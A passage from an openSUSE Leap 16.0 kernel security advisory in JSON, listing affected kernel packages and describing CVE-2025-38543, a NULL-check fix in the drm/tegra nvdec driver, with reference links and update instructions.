"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38541"
},
{
"cve": "CVE-2025-38543",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38543"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tegra: nvdec: Fix dma_alloc_coherent error check\n\nCheck for NULL return value with dma_alloc_coherent, in line with\nRobin\u0027s fix for vic.c in \u0027drm/tegra: vic: Fix DMA API misuse\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38543",
"url": "https://www.suse.com/security/cve/CVE-2025-38543"
},
{
"category": "external",
"summary": "SUSE Bug 1248214 for CVE-2025-38543",
"url": "https://bugzilla.suse.com/1248214"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
